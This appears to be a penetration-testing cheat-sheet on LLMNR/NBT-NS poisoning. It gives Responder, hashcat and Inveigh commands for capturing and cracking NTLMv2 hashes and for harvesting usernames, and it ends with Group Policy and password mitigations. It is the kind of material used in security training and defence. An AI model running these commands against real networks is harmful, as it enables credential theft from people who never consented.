Skip to content

LLMNR Poisoning

From Linux


https://github.com/SpiderLabs/Responder

sudo responder -I eth0 
Wait for hashes to come in Crack them with
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From Windows


Using Inveigh

https://github.com/Kevin-Robertson/Inveigh

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe
We can quickly view unique captured hashes by typing GET NTLMV2UNIQUE. We can type in GET NTLMV2USERNAMES and see which usernames we have collected. This is helpful if we want a listing of users to perform additional enumeration against and see which are worth
attempting to crack offline using Hashcat.

Mitigation


  1. Select "Turn OFF multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor
  2. Disable NBT-NS navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBios over TCP/IP". If you cannot disable for whatever reason
  3. Require Network Access Control (NAC)
  4. Require strong passwords: over 14 characters with capitals and symbols and no common words. The better the password, the longer it takes an attacker to crack the hash